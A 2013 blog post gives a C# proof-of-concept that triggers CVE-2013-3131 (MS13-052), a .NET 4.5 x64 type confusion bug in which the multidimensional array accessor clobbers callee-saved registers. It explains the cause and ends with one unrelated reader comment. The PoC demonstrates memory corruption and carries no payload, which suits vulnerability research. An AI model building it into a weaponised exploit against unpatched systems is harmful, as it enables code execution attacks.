# Wednesday, 10 July 2013
## Type Confusion PoC for CVE-2013-3131 (MS13-052)

I did not discover this vulnerability (Alon Fliess filed the (public) bug report), but I decided to investigate it and write a PoC exploit:

```csharp
using System;
using System.Runtime.CompilerServices;

// Three-byte value type; an element of Foo[,] is read through the generated
// multidimensional array accessor.
struct Foo {
  byte b1, b2, b3;
}

class U1 { }
class U2 { }

// Live reference-typed locals; the type confusion arises when references held
// in RSI/RDI are clobbered by the array accessor.
struct StackFields {
  internal object f1;
  internal U1 f2;
  internal U2 f3;
}

class Program {
  long field1;
  long field2;

  static void Main() {
    new Program().Get(new Foo[1, 1]);
  }

  // Generic method: the type parameter T is bound nowhere else in the listing,
  // so <T> is restored here; T is inferred as Foo from the call in Main.
  object Get<T>(T[,] arr) {
    StackFields fields = new StackFields();
    fields.f1 = new U1();
    fields.f2 = new U1();
    fields.f3 = new U2();
    object v = arr[0, 0];   // the generated accessor clobbers RSI and RDI
    field2 = field1;
    return v;
  }
}
```

This requires .NET 4.5 on x64, and it must be built and run in release mode.

The bug is that the generated accessor for the multidimensional array clobbers the RSI and RDI registers. These are non-volatile (callee-saved) registers in the x64 calling convention, so any references the caller keeps in them are corrupted by the time the accessor returns.

Wednesday, 10 July 2013 13:05:47 (W. Europe Daylight Time, UTC+02:00)

Comments
Tuesday, 01 October 2013 11:29:59 (W. Europe Daylight Time, UTC+02:00)
Hi, I tried using IKVMC and successfully converted Java to C#, but I have problems when using the rxtx library: "Attempt to get long field "gnu.io.RXTXPort.eis" with illegal data type conversion to int" when trying to read the input stream from the port. Please help me if you can.
